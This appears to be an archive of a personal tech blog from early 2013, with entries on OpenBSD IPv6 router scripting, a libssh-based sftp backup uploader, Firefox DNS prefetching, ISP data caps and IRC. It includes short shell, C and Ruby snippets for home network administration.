I spent time in the channels #unixhelp, #unix, #toronto, #germany, #bork, #freebsd, where some more and some less. I was very taken with the #unix crowd and liked being there but admittedly I was always a bit careful because of the chance that I get hacked by someone there (it was a large channel of 100 or so clients). Eventually I left #unix and went totally offline (from the Internet) when I had a new toy. An iBook with built in wireless lan. I spent the Summer of 2000 mostly outdoors riding around wardriving with it.

The wardriving did me no good and I eventually came back online and this time not to #unix but #unixhelp. There were people from #unix there so I knew some people. To this day I IRC on efnet and IRCnet on the channels #unixhelp, #bluenight and #dns. More on this all later.



NAP of the Americas in Miami

January 31st, 2013

The BBC has an article about the NAP of the Americas in Miami, USA. Here it is. The NAP is what most routes from Germany go through when I traceroute my Panamanian VPS. Interesting building, it reminds me a little of 151 Front albeit much larger.



Wire-tapping of the Cloud...

January 31st, 2013

My blog and other data stored on my VPS's can be examined by the NSA through the American hoster I use. This is cautioned by the BBC. In particular the VPS in Hong Kong then falls under the jurisdiction of the NSA, because I use an American provider based in Los Angeles. The VPS in Panama is operated by a Canadian company and they probably have similar laws. So my data is wide open to the American continent. I do not know what sort of information they would like to gather though, other than web and DNS logs. In terms of juiciness my blog doesn't have very much worth spying over. But I thought the article in the BBC was intriguing nonetheless. I'm not going to pull back my blog over this though.



If I do upgrade Jupiter(computer)...

February 1st, 2013

Then here is a series of chips to consider. Jupiter is currently an i7-930, but an i7-980 would be nice but is still pricy, with 3 years warranty however it would give 6 year lifespan of the 3 year old machine perhaps. I'm watching for the price for the 970/980 to come down.

I'm also considering what tasks I want running on Jupiter. Right now there isn't too much CPU intensive stuff. Also Jupiter never ran over nights. I turn it off at night and plan on continuing to do so.



This is actually cool!

February 2nd, 2013

Let's start with my computer for cooling. :-) The fact that this was developed in China is cool too because most computer parts come from there...



Slowly getting ready for move

February 09th, 2013

On the 12th my provider M-Net will activate the DSL link. I've taken the 12th and 13th off work so that I can hook everything up at home. I'm worried about not getting back my static IP, which I had for 4 years. I let M-Net know this but haven't had a reply from them yet. Not getting the static IP will not be the end of the world, but the end of e-mail, www, shell server and other stuff at home. I truly hope I get my static IP back though, and will fight for it.



I've moved

February 13th, 2013

Last night was the first night in my new apartment. Everything went well during the move and I got Internet yesterday at around noon. Here is a picture of my workbench and new stand-up table. I alternate between the two due to my lower back problems.

It looks a bit messy because I just dumped all my stuff on the table but I hope to rearrange things so that I can see the wood on the table.



My new IPv6 setup

February 14th, 2013

Happy Valentines day. I'm spending it alone with IPv6 :-). But I want to show you what I did and perhaps you have a few hints for me on how to improve it.

I have a Fritz!Box router (a home consumer router) which costs around 100 euros. I got mine for free with the new plan with M-Net, my provider. M-Net provides IPv6 on a test basis and since I can't get a static IP anymore with them I'm using it instead of the IPv6 tunnel I used to have. This is what my network looks like now:

                Simplified IPv6 Network at Centroid.EU


                      +-----------+
                      | Gaia      |
                      | Luna (vm) |
                      | Mac OS X  |
                      |           |
                      +-----+-----+
                            |
  +-----------+       +-----+-----+                             +----------+
  |           |       |           |                             | Fritz.box|
  | Jupiter   |_______|  Uranus   |_____________________________| 3270     |
  | OpenBSD   |       |  OpenBSD  |         Fritz.repeater      |          |
  |           |       |           |                             |          |
  +-----------+       +-----+-----+                             +-----+----+
                            |                                         |
                      +-----+-----+                                   |
                      |           |                                Internet
                      |  Mars     |
                      |  OpenBSD  |
                      |           |
                      +-----------+
The fritzbox announces IPv6 through route advertisements and delegates a /62 from the /56 prefix that M-Net provides me with. This /62 is given through DHCPv6 so I had to install isc-dhcpd from the ports on OpenBSD to make it work. However I faced a dilemma: how does Uranus on the fritzbox-facing interface know its IPv6? I wrote a small script to enable it with rtsol, and the script also adds rtadvd for automatic discovery on Jupiter, Mars, Gaia and Luna. I'm going to show one of these as an example. First to Uranus though, its /etc/hostname.em5 interface looks like this:
# more /etc/hostname.em5
dhcp
!/root/update-rtadv.sh
And I've written the /root/update-rtadv.sh script quickly so it may be buggy, but it works across reboots:
#!/bin/sh

PATH="/sbin:/bin:/usr/sbin:/usr/bin"
export PATH

/usr/local/sbin/dhclient -6 -P -D LLT  em5

PREFIX=`grep iaprefix /var/db/dhclient6.leases  | tail -1 | awk '{print $2}' | awk -F/ '{print $1}'`

EM0=`echo $PREFIX `
EM1=`echo $PREFIX | sed -e 's/:8fc:/:8fd:/g'`
EM2=`echo $PREFIX | sed -e 's/:8fc:/:8fe:/g'`
EM3=`echo $PREFIX | sed -e 's/:8fc:/:8ff:/g'`

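# The body of this here-document did not survive on the page; only the
# redirect into /etc/rtadvd.conf did. The entries below are an assumed
# reconstruction: one /64 per internal interface, named em0-em3 after
# the variables above.
(cat <<EOF
em0:\\
	:addr="$EM0":prefixlen#64:
em1:\\
	:addr="$EM1":prefixlen#64:
em2:\\
	:addr="$EM2":prefixlen#64:
em3:\\
	:addr="$EM3":prefixlen#64:
EOF
) > /etc/rtadvd.conf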

/etc/rc.d/rtadvd restart


route delete -inet6 default

while :: ; do
        ifconfig em5 | grep "inet6 2001:" 
        if [ $? -eq 1 ]; then
                break;
        fi

        sleep 10
done

backprefix=`rtsol -d em5 2>&1 |\
grep "received RA from" |\
awk '{print $4}' |\
awk -F:: '{print $2}'`


frontprefix=`ifconfig em5 | grep "inet6 2001:" | awk '{print $2}' | \
awk -F: '{print $1 ":" $2 ":" $3 ":" $4 ":" ; }'`

/sbin/route add -inet6 default $frontprefix$backprefix

exit 0
So when I'm on jupiter and I run a continuous ping6 on io.solarscale.de, it looks like this:
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=11 hlim=56 time=14.069 ms
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=12 hlim=56 time=17.013 ms
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=13 hlim=56 time=15.712 ms
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=14 hlim=56 time=14.167 ms

16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=95 hlim=56 time=35.225 ms
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=96 hlim=56 time=14.689 ms
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=97 hlim=56 time=15.765 ms
16 bytes from 2a01:4f8:d13:1980::22, icmp_seq=98 hlim=56 time=14.213 ms
^C
--- io.solarscale.de ping6 statistics ---
99 packets transmitted, 19 packets received, 80.8% packet loss
round-trip min/avg/max/std-dev = 13.973/16.219/35.225/4.611 ms
As you can see it ping'ed across a reboot and that means that all IP's and routes were configured correctly. On Mars I have an rtsol setup to get its IPv6 and its /etc/hostname.gem0 looks like this:
mars$ more /etc/hostname.gem0
dhcp
rtsol
I had to also enable rtsold in /etc/rc.conf.local and enable route advertisements per sysctl.conf. The configured interface gem0 on mars looks like this then:
mars$ ifconfig gem0
gem0: flags=8863 mtu 1500
        lladdr 00:30:65:a1:ec:a6
        priority: 0
        groups: egress
        media: Ethernet autoselect (100baseTX full-duplex)
        status: active
        inet6 fe80::230:65ff:fea1:eca6%gem0 prefixlen 64 scopeid 0x1
        inet6 2001:a60:18e5:8fd:230:65ff:fea1:eca6 prefixlen 64 autoconf pltime 604697 vltime 2591897
        inet 192.168.33.4 netmask 0xffffff00 broadcast 192.168.33.255
I still have to set up some sort of dynamic DNS for the IPv6 so that I can easily reach these hosts from each other since I can't remember their IPv6 address and on Gaia (the mac os x) the IPv6 keeps changing due to privacy extensions. However for outgoing IPv6 this setup works. Incoming is blocked at the fritzbox router anyhow and I haven't figured out how to set the IPv6 firewall rules right yet. I've sent AVM the maker a support email after consulting with M-Net.

I hope this helps the next person and if you have improvements let me know in the comments or mail me directly. Thanks.
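The update-rtadv.sh script above gets its four /64s by rewriting the literal `:8fc:` hextet, which only holds while the same prefix keeps being delegated. As an added example (not the author's script), this sketch computes the /64s arithmetically from whatever prefix the lease contains and prints rtadvd.conf entries for them; the function names, the em0-em3 interface list and the sample lease text are assumptions.

```shell
#!/bin/sh
# Added example: derive consecutive /64s from a DHCPv6-delegated prefix.

# Constructed sample of the part of /var/db/dhclient6.leases that matters here.
SAMPLE_LEASE='lease6 {
  interface "em5";
  ia-pd 00:00:00:01 {
    iaprefix 2001:a60:18e5:8fc::/62 {
      preferred-life 3600;
      max-life 7200;
    }
  }
}'

# Print the most recent delegated prefix (with its /len) from lease text on stdin.
latest_iaprefix() {
    awk '$1 == "iaprefix" { p = $2 } END { if (p != "") print p }'
}

# Print all eight hextets of an IPv6 address, space separated, expanding "::".
expand_hextets() {
    case $1 in
        *::*) left=${1%%::*}; right=${1#*::} ;;
        *)    left=$1; right= ;;
    esac
    set -- $(echo "$left" | tr ':' ' ')
    nleft=$#; lwords=$*
    set -- $(echo "$right" | tr ':' ' ')
    fill=$((8 - nleft - $#))
    while [ "$fill" -gt 0 ]; do
        lwords="$lwords 0"
        fill=$((fill - 1))
    done
    echo $lwords "$@"
}

# split_prefix PREFIX/LEN -> every /64 inside the delegation, one per line.
# Only /48 to /64 is handled, so all variable bits sit in the fourth hextet.
split_prefix() {
    case $1 in */*) ;; *) echo "split_prefix: need PREFIX/LEN" >&2; return 1 ;; esac
    net=${1%/*}
    len=${1#*/}
    if [ "$len" -lt 48 ] || [ "$len" -gt 64 ]; then
        echo "split_prefix: only /48 to /64 handled, got /$len" >&2
        return 1
    fi
    set -- $(expand_hextets "$net")
    h1=$1 h2=$2 h3=$3
    count=$((1 << (64 - len)))
    base=$((0x$4 & ~(count - 1)))     # clear any bits below the prefix length
    n=0
    while [ "$n" -lt "$count" ]; do
        printf '%s:%s:%s:%x::\n' "$h1" "$h2" "$h3" $((base + n))
        n=$((n + 1))
    done
}

# rtadvd_conf PREFIX/LEN IFACE... -> rtadvd.conf text, one /64 per interface.
rtadvd_conf() {
    pd=$1; shift
    prefixes=$(split_prefix "$pd") || return 1
    for ifname in "$@"; do
        p=$(echo "$prefixes" | sed -n 1p)
        prefixes=$(echo "$prefixes" | sed 1d)
        if [ -z "$p" ]; then
            echo "rtadvd_conf: delegation too small, no /64 left for $ifname" >&2
            return 1
        fi
        printf '%s:\\\n\t:addr="%s":prefixlen#64:\n' "$ifname" "$p"
    done
}

# Demo on the constructed lease: prints four interface entries.
delegated=$(printf '%s\n' "$SAMPLE_LEASE" | latest_iaprefix)
rtadvd_conf "$delegated" em0 em1 em2 em3
```

If the provider hands out a different or smaller delegation, the output changes with it or the function fails loudly instead of advertising a prefix that was never delegated.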



Reinstated CVSWEB for my programs

February 15th, 2013

I have ported the viewvc to lighttpd configuration and now my programs code history is viewable again. I will be committing new stuff shortly, which hopefully will reflect in these.

Feel free to check these out. I'll be rolling a new BETA release for wildcarddnsd soon.



Wildcarddnsd BETA 7 released

February 17th, 2013

I got all the patches that I had and put them in, tweaked it a little yesterday and tagged the source tree. I made a mistake with the branch tag but that was easy to fix. Here is how I did it:

cvs tag -b -r OLDTAG NEWTAG     # puts a new tag on the old position
cvs tag -d OLDTAG		# removes the old tag
So here are the new things from previous wildcarddnsd release:
Changes in BETA_7 from BETA_6

	- remote (sys)-logging feature with HMAC message verification
	- change to Berkeley DB 4.6+ on BSD hosts (Linux had it already)
	- allow numerous copies of wildcarddnsd to pre-fork (-n flag)
	- AXFR master code (this allows a bind9 slave to work with wildcarddnsd)
	- fix an integer overrun in parse.c which prevented big endian hosts to
	  make use of ANY replies and AXFR
	- SRV RR support
	- left sourceforge.net around August 14, 2012
	- Mac OS X compiles now, but has not been tested with queries
Yes I'm not hosting at sourceforge.net anymore. I managed to leave them just before my old apartment building's fire and just before SF was sold. I do my own hosting of the sources and cvsweb and so on. Because of that decision I follow EU export laws not US export laws.

The next BETA release will likely happen around Nov 29, 2013 right on W's birthday (BETA_8 and 8 years old). I'm aiming for yearly releases and at BETA_10 I hope to have enough stuff in there that I can call it RELEASE_1 but we'll see. Enjoy these changes you can download the new snapshot (called 0.7.0) from here.



Introducing Fire Curses client

February 17th, 2013

The fire curses client (firec) is what I did while I was at my parents after the apartment fire. It allows me to IRC in a semi-windowed environment. Browse and download the source here:



Firefox does DNS prefetching in OpenBSD

February 19th, 2013

I did not know this, and I noticed it today with packet dumping on my firewall. In German I would say "Das ist eine Sauerei!". Anyhow I googled a little and found this helpful blog. Basically what DNS prefetching is, is that when you visit a website and that website happens to have the link http://www.centroid.eu on it, the browser conducts a lookup of this Internet name and caches it. It could speed things up, but I think it's a privacy invasion on my part, because I look at an offline wikipedia here and the citations show someone sniffing outside my link what page I'm looking up by correlating. Yes I'm paranoid and it's not their business.
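What that correlation looks like from the firewall's side, as an added example that is not part of the original post: the script lists the hostnames a page links to and checks which of them appear as DNS queries in a tcpdump-style capture. The page, the capture lines and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: match DNS lookups seen on the wire against links on a page.

# Constructed sample: a locally stored article with outbound citation links.
SAMPLE_PAGE='<html><body>
<p>See <a href="http://www.centroid.eu/blog/">this blog</a> and
<a HREF="https://Example.org:8443/paper.pdf">this citation</a>.</p>
<a href="/wiki/Local_article">relative link, no lookup needed</a>
<link rel="dns-prefetch" href="//cdn.example.net">
</body></html>'

# Constructed sample: "tcpdump -n port 53" style lines captured on the firewall.
SAMPLE_DUMP='12:00:01.100000 IP 192.168.33.2.40001 > 192.168.33.1.53: 1001+ A? www.centroid.eu. (33)
12:00:01.100500 IP 192.168.33.2.40002 > 192.168.33.1.53: 1002+ AAAA? www.centroid.eu. (33)
12:00:01.101000 IP 192.168.33.2.40003 > 192.168.33.1.53: 1003+ A? example.org. (29)
12:00:09.000000 IP 192.168.33.2.40004 > 192.168.33.1.53: 1004+ A? ftp.openbsd.org. (33)'

# stdin: HTML. stdout: sorted unique hostnames found in absolute or
# protocol-relative href values (relative links carry no hostname).
linked_hosts() {
    tr 'A-Z' 'a-z' | tr '<' '\n' |
        sed -n 's|.*href="[a-z]*:\{0,1\}//\([^/":]*\).*|\1|p' |
        sort -u
}

# stdin: tcpdump text. stdout: sorted unique names asked for in A/AAAA queries.
queried_names() {
    sed -n 's/.* A\{1,4\}? \([^ ]*\)\. .*/\1/p' | tr 'A-Z' 'a-z' | sort -u
}

# prefetch_matches PAGE DUMP -> looked-up names that are also linked on the page.
# These are the lookups an on-path observer could tie back to that page.
prefetch_matches() {
    hosts=$(printf '%s\n' "$1" | linked_hosts)
    [ -n "$hosts" ] || return 0
    printf '%s\n' "$2" | queried_names | grep -Fx -e "$hosts" || true
}

# other_lookups PAGE DUMP -> looked-up names the page does not explain.
other_lookups() {
    hosts=$(printf '%s\n' "$1" | linked_hosts)
    if [ -z "$hosts" ]; then
        printf '%s\n' "$2" | queried_names
        return 0
    fi
    printf '%s\n' "$2" | queried_names | grep -Fxv -e "$hosts" || true
}

echo "lookups explained by links on the page:"
prefetch_matches "$SAMPLE_PAGE" "$SAMPLE_DUMP"
echo "lookups not explained by the page:"
other_lookups "$SAMPLE_PAGE" "$SAMPLE_DUMP"
```

In Firefox the behaviour is governed by the `network.dns.disablePrefetch` preference in about:config; with it set to true, the first list should stay empty until a link is actually clicked.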



Donation time again

February 24th, 2013

Roughly the same time as last year.

So I'm really into this by now, when there is a project that I see sense in giving money I give them money :P. Also one has to understand that I use OpenBSD and FreeBSD at work, so these projects help me make my money so why shouldn't I share a little of that? I think it's right and justified.



Teleworking: Mrs. Mayer you're (still) wrong

February 28th, 2013

Recently the news of Marissa Mayer (CEO of Yahoo) pulling all teleworkers at their organization back to their own corporate headquarters struck me. I found it wrong, but in discussion with a few Californians on IRC they were of the perception that workers at Yahoo who teleworked from home got a free paid vacation. BBC made an article about it.

I work from home and work is 6 timezones away in another hemisphere. This comes to my benefit though because I'm able to do technical maintenance on the computers at 4AM when it's 10AM here. This allows me to upkeep a "day" lifestyle, none of that 12 hour-days insanity that I did in my 20's. In fact everything is a lot more relaxed in operations so that we can draw benefits from me working from 6 timezones away.

Sure there are days I wished I could have been a bit more productive or had a buddy help me with something, but I believe my time is very productive. Another add-on to that is that I only work 30 hours a week and cannot do more because of illness (my doctor recommends this much). However working from home requires discipline. That's why I have an "office", a dedicated room in the apartment where I do my daily/eveningly tasks. This apartment is relatively new and I did some work out of a 1-room apartment for a few months, I'm glad that is behind me.

So I would say to Mrs. Mayer "you're not being fair to teleworkers". As every situation is different, and teleworkers have a strange but effective benefit.

Related articles found with search on this blog:



My first video entry

February 28th, 2013

I have made a video entry introducing my blog. I recorded off the webcam and converted the .avi to theora with ffmpeg2theora. A Firefox browser should be able to run this. It works on my OpenBSD box.

So yeah bad hair day!

This is what I use to record this with:

#!/bin/sh

OUTFILE=$1
ffmpeg  -f sndio -i rsnd/0 -s 320x240 -f video4linux2 -i /dev/video0  -r 30 $OUTFILE 
It's a 12 euro mic and a 30 euro webcam...that says it all.



SVPradio 100th show next Wednesday

February 28th, 2013

Be sure to check out SVP Radio on Wednesday March 6th, starting at 6PM Eastern North American time. We have made a few changes which allow listening through the browser, and it may even work on an iPhone.



My first libssh program

March 7th, 2013

I have made a libssh program to sftp a file from standard input to a file on an sftp site. I use strato hidrive cloud storage for my backups and that is what I use this file for. I pipe it through openssl and another one time pad program to make sure strato can't look at my stuff. I want to share the code, here it is:

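/*
 * The header names were stripped from the page; the ones below are the
 * headers the code that follows needs (libssh, OpenSSL MD5, libc).
 */
#include <sys/types.h>
#include <sys/stat.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>

#include <libssh/libssh.h>
#include <libssh/sftp.h>

#include <openssl/md5.h>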

#define FTPUSER         "secret"
#define FTPPASS         "extrasecret"


int
main(int argc, char *argv[])
{
        ssh_session sess;
	sftp_session sftp;
	sftp_file file;

        char *user = FTPUSER;
        char *pass = FTPPASS;

        char buf[512];
        u_char md5buf[16];
        char timebuf[32];
	u_char *hash = NULL;

        int ch, fd, rc;
        int len;
	int state, hlen;
        int checksum = 0;
	int nwritten;

        struct tm *tm;
        MD5_CTX ctx;
        time_t now;

        while ((ch = getopt(argc, argv, "mp:u:")) != -1) {
                switch (ch) {
                case 'm':
                        checksum = 1;
                        break;
                case 'u':
                        user = optarg;
                        break;
                case 'p':
                        pass = optarg;
                        break;
                }
        }

        argc -= optind;
        argv += optind;

        if (argv[0] == NULL || argv[1] == NULL) {
                perror("args -> IP file");
                exit(1);
        }

	/* log in here */

	if ((sess = ssh_new()) == NULL) {
		perror("ssh_new");
		exit(1);
	}

	ssh_options_set(sess, SSH_OPTIONS_HOST, argv[0]);
	
	if ((rc = ssh_connect(sess)) != SSH_OK) {
		fprintf(stderr, "error connecting to %s: %s\n", argv[0],
			ssh_get_error(sess));
		ssh_free(sess);
		exit(1);
	}	

	state = ssh_is_server_known(sess);
	hlen = ssh_get_pubkey_hash(sess, &hash);

	if (state != SSH_SERVER_KNOWN_OK) {
		fprintf(stderr, "something was wrong with the session "
			"state, to be sure I'll just exit here..\n");
		ssh_disconnect(sess);
		ssh_free(sess);
		exit(1);
	}
		
	if ((rc = ssh_userauth_password(sess, user, pass)) != SSH_AUTH_SUCCESS) {
		fprintf(stderr, "error authenticating...\n");
		ssh_disconnect(sess);
		ssh_free(sess);
		exit(1);
	}
	
	
	if ((sftp = sftp_new(sess)) == NULL) {
		fprintf(stderr, "Error allocating SFTP session: %s\n",
			ssh_get_error(sess));

		ssh_disconnect(sess);
		ssh_free(sess);
		exit(1);
	}
	
	if ((rc = sftp_init(sftp)) != SSH_OK) {
		/* sftp_get_error() returns an int error code, not a string */
		fprintf(stderr, "Error initializing SFTP session: %d\n",
			sftp_get_error(sftp));
		sftp_free(sftp);
		ssh_disconnect(sess);
		ssh_free(sess);
		exit(1);
	}	

	snprintf(buf, sizeof(buf), "/home/pjp/%s", argv[1]);

	file = sftp_open(sftp, buf, O_WRONLY | O_CREAT | O_TRUNC, 0600);
	if (file == NULL) {
		fprintf(stderr, "can't open file for writing: %s\n", 
				ssh_get_error(sess));
		sftp_free(sftp);
		ssh_disconnect(sess);
		ssh_free(sess);
		exit(1);
	}

        if (checksum) {
                (void)MD5_Init(&ctx);
        }


        while ((len = read(STDIN_FILENO, &buf, sizeof(buf))) > 0) {
                if (checksum) {
                        (void)MD5_Update(&ctx, buf, len);
                }               

		nwritten = sftp_write(file, buf, len);
		if (nwritten != len) {
			fprintf(stderr, "can't write/append data to file: %s\n",
				ssh_get_error(sess));
			sftp_free(sftp);
			ssh_disconnect(sess);
			ssh_free(sess);
			exit(1);
		}
        }

	rc = sftp_close(file);
	if (rc != SSH_OK) {
		fprintf(stderr, "can't close the written file: %s\n", 
			ssh_get_error(sess));
	}
	
	sftp_free(sftp);

	/* ssh cleanup */

	ssh_disconnect(sess);
	ssh_free(sess);

	/* end checksumming */

        if (checksum) {
                (void)MD5_Final((u_char *)md5buf, &ctx);
                
                fd = open("/root/history.md5", O_WRONLY | O_CREAT| O_APPEND, 0600);
                if (fd < 0) {
                        perror("open");
                        exit(1);
                }
                now = time(NULL);
                tm = localtime(&now);
                strftime(timebuf, sizeof(timebuf), "%F", tm);
                snprintf(buf, sizeof(buf), 
"%s %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x\n", 	
			timebuf, argv[1], 
                        md5buf[0] & 0xff, md5buf[1] & 0xff, md5buf[2] & 0xff,
                        md5buf[3] & 0xff, md5buf[4] & 0xff, md5buf[5] & 0xff,
                        md5buf[6] & 0xff, md5buf[7] & 0xff, md5buf[8] & 0xff,
                        md5buf[9] & 0xff, md5buf[10] & 0xff, md5buf[11] & 0xff,
                        md5buf[12] & 0xff, md5buf[13] & 0xff, md5buf[14] & 0xff,
                        md5buf[15] & 0xff);

                write(fd, buf, strlen(buf));
                close(fd);
	}

	exit (0);
}

The program has hardcoded passwords, not optimal but it works. Also the key must match or it bails immediately (or should). Have fun with this!



Ordered two books

March 8th, 2013

I have ordered two books, hoping they'll help me.

I like how these aren't C like languages because I like to keep a separation from my C knowledge and other languages.



An era ends?

March 10th, 2013

In 1999 or so I switched globalserve.net's relay mail servers to postfix, taking the load off sendmail. Today I switched my main mail servers to OpenSMTPD, ending 14 years of loving postfix. I still run postfix at work but in time we'll be able to switch it as well, I hope.



Equinox in 2 days

March 18th, 2013

The Northward Equinox is upon us again in 2 days on March 20th, 11:02 AM UT. This is also called the March Equinox or for a northern hemispherer the Spring Equinox. Have fun with this information!



First day of Spring! Goodbye Winter!

March 20th, 2013

Just like the Hooray! that I let out in 2011, I'm very excited that this winter is gone. I'm hoping we get blue skies this spring as well. BTW that link when you click it has a picture with an Analemma on it. I made a mistake with the equinoxes, they are in fact further down and not at the joint of the figure eight. Oh well, I can't always have correct astronomy, astronomy is a learning cycle, based on wrong assumptions and proofs (although I didn't prove the analemma, I just read about it in an astronomy magazine, which proved me wrong).



Switched emea to FreeBSD

March 24th, 2013

I have switched my EMEA vps to FreeBSD. It took all day as I had to configure jails in it, but I think I'm mostly done. I'm just watching the 1st backup of it go through to my online storage.



OpenBSD has released its 5.3 Song

March 25th, 2013

OpenBSD, the OS that strives for best security, has released its most recent media, the 5.3 song. They are also doing pre-orders for the 5.3 release at OpenBSD.org. If you've been using OpenBSD and downloading it from the Internet, consider buying a copy once in a while. It makes all the difference.



My sorta first ruby program

March 30th, 2013

I was watching "the bourne identity" last night and during the breaks I programmed on my first ruby program, here it is:

#!/usr/local/bin/ruby -w

#
# this program reads from argv and takes a name argument it then says hello
#

if ARGV.size == 1
        input = ARGV[0]
else
        exit 1
end

#
# ok we got a name lets do something with it
#

if input == "peter"
        puts "hello peter, nice of you to come back to me"
elsif input == "jason"
        puts "mr bourne, you're still in paris?"
else
        puts "hello " + input + ", how are you?"
end

#Process.kill("ABRT", Process.pid)

exit 0
A friendly person in an efnet channel made a 1 liner out of this:
#!/usr/local/bin/ruby -w

puts ({ "peter" => "nice of you to come back to me peter", \
"jason" => "still in paris mr bourne?" })[ARGV.shift]

Process.kill("ABRT", Process.pid)
I later added the SIGABRT's in order to look at the size of the memory image and his has a larger memory footprint than mine. I guess size is misleading.



Next wednesday is SVP Radio's 2nd year anniversary

March 30th, 2013

Do a search for "anniversary", we've been doing this two years now. This time there isn't as many pictures as last anniversary but it's also our second and not the first.



Goodbye Source!

April 1st, 2013

A large company's spokesman has approached me and offered 100,000 dollars for my source code found here . I'm going to buy a tablet with that money, and possibly getting rid of all my computers that have a keyboard.



I'm still anti-nuclear

April 2nd, 2013

.. and I'd like to say that I'd like to see a nuclear free a) Germany, b) Europe, c) Planet. Although c is much harder to achieve than a or b, I still want to let people know that I support german dismemberment of nuclear power plants. We can do it without these power plants I'm sure of it.



Pre-ordered OpenBSD 5.3 CD

April 6th, 2013

I have pre-ordered OpenBSD 5.3 CDs from Lehmanns.de. Last year Lehmanns was late. Hoping it will be different this year.



EFnet.XS4ALL.NL has K-lined Hetzner.de IP's

April 8th, 2013

I got this message on my IRC window:

[16:50:23] :efnet.xs4all.nl 465 pjp :You are banned from this server- heztner.de
 are no longer welcome on efnet.xs4all.nl, due to leaking information to kiddies
. Fuck right off, hetzner. (2013/4/8 14.50)(0x0d)                               
[16:50:23] :pjp!~pjp@trojan.solarscale.de QUIT :Connection closed(0x0d)         
[16:50:23] ERROR :Closing Link: trojan.solarscale.de (Connection closed)(0x0d)

I do hope both parties will come to an agreement to once again let me IRC through hetzner. Pretty sick by xs4all to put pressure on hetzner this way though.



Total Rip-Off, I'm gonna keep it!

April 12th, 2013

I ordered a book called "Berkeley Yacc" in hopes that I can understand how yacc works better because the other book isn't doing it for me. Well yesterday I got it. 100 pages of wikipedia printed. 2 pages covering the story behind yacc but no internal explanations. Now because the book has Unix and OpenBSD mentioned in it I'm gonna keep it but it's not worth 33 euros! Perhaps 6.95 or such. I left a "rezension" on amazon.de regarding this with the title "glad to put money in your pocketses" or something. Since there is a robots.txt file protecting this blog you won't be able to google my disappointment but I felt I needed to let it off my chest.



Germany's Deutsche Telekom starts a 75 GB Cap on DSL

April 23rd, 2013

Germany's Deutsche Telekom has put a cap on DSL up to 16 Mbit/s. 75 GB a month. My parents are on DT and I think I'm going to move them off, how I do that will be a bit hard but not impossible. I'm planning on switching them to SIP completely, if they agree. Looking at my last month's stats at another flat free provider I used a bit more than 75 GB (around 90 GB), so what DT is doing is not right. I'm sure many people are going to debate this, and here is my advice if you're on DT. Switch providers.



Network Rearrangement Next Week

April 25th, 2013

In a week is May 1st. That means OpenBSD 5.3 will be released and I'm going to have to upgrade 4 computers. I'm also going to repurpose Mars my MacPPC computer. It will become a tunnel host so that I can use IPSEC across my wifi link. I've created a small map for this:

This will be in effect for 1 year or so, and then I will retire Mars. So this is likely going to be its last upgrade. So what will come of Mars in 2014? I already wrote about it last year. Instead of retiring Jupiter I think I'll keep it another year and I'll just get a Mars replacement called Venus. Venus will likely be a Soekris computer with an Atom processor.



1 month left for goldflipper.net

April 25th, 2013

I got goldflipper.net in 2010. It served me for three years, but I have to give it up, I simply don't want to keep it. Over the course of these three years I have given out the following subdomains to people on IRC:

I hope they didn't get me in trouble by usage, but I trust they won't. So there is a month left of this then it's over.



Saturn in Libra (close to the moon)

April 25th, 2013

I recently found a screenshot of Saturn in 2010. Back then it was in Virgo at roughly 11:53:54 Right Ascension; now it is at 14:26:22 Right Ascension in the constellation Libra. This means that in 2 years and 327 days (1057 days) it travelled 2 hours, 32 minutes and 28 seconds on a clock which is roughly 10.5% of a full revolution of sun. Does this match when Wikipedia says that Saturn's year is 29.4 years or 10,759.22 earth days? 1057 / 10.5 * 100 = 10066 days. Pretty close approximation indeed. Seems Saturn is still in the heavens like usual.



What DT is doing wrong

April 26th, 2013

By cutting the flatrate in Germany Deutsche Telekom has left not many options on the table for its customers but to leave and seek providers elsewhere. They say that three percent of all users use a volume worth 30% of the entire traffic going through its customer links. That may be true, but no one has ever complained about it before, in fact people like subsidizing the heavy users, because sometimes they too do more downloading than ever before. So what DT is doing wrong by cutting the flatrate is that they aren't offering upgrade packages to existing capped bandwidth. Pretend you use up 75 GB and are capped down to 384 Kbit/s, other than email nothing else really works at that point. Telekom is not offering a "75 GB for 25 euro" package upgrade of sorts so that you can continue downloading. And this is a real crime as seen from a consumer perspective. I think Telekom is in the process of mismanagement.

Other ISP's that (I think) are good:

Most of these are mid sized businesses with around 250,000 customers each, they could use those 3% from the Telekom in my opinion. I invite your list of good providers in Germany in the comments.



Taking a vacation from IRC

April 28th, 2013

I joined efnet in 1995 or 1996 as a way to get over my MUD addiction. Today I decided I'm going to take a vacation from it. How long I don't know but if it's forever then it be forever. Is IRC dying?



Why would a provider get rid of flatrate?

April 29th, 2013

Recently Deutsche Telekom announced that they are getting rid of their flat rate for DSL. I've been giving this some thought, around discussion, and here is what I've noticed:

These are some thoughts of mine that make me wonder. It is definitely an attack on freedom and net neutrality in my view. I'm having trouble convincing my parents to switch for what it's worth. At 15 GB usage last month they aren't affected they say and they say other providers will follow suit. I think that's not correct but we'll see.



OpenBSD 5.3 released, 3 hosts upgraded

May 1st, 2013

Today was network rearrangement day and upgrade day. I have upgraded mars, jupiter, and luna. I didn't upgrade uranus yet because I want to figure out some weirdnesses with it.

I now have ipsec'ed tunnels going from luna, jupiter and uranus to mars and mars acts like a router. The ipsec'ed tunnels protect the wifi bridge which is encrypted too so I have extra encryption. More later.



The cravings are bad...

May 2nd, 2013

I crave chatting on IRC. This tells me I was addicted. But I'm gonna beat the addiction, I have considered writing a program that simulates IRC with people randomly talking about cameras and throwing numbers around (camera model #'s) that I don't know. In fact a lot of the "trash" talk I can probably do without, in the last few years it got especially trashy as people lost a sense of purpose (in my opinion) why they were there.



My Compression Algorithm doesn't work

May 2nd, 2013

I have done some tests with a document I wrote in 2010 called my-compression.txt found on my /public stash. Well I came to the conclusion that there are too many collisions to give a definite answer on a compressed segment of 38 bytes. Too bad. I'm still hoping for a compression algorithm that can be re-compressed, thus ending all bandwidth and volume problems. But it's just a dream, it seems.



Google Glass doesn't really faze me

May 3rd, 2013

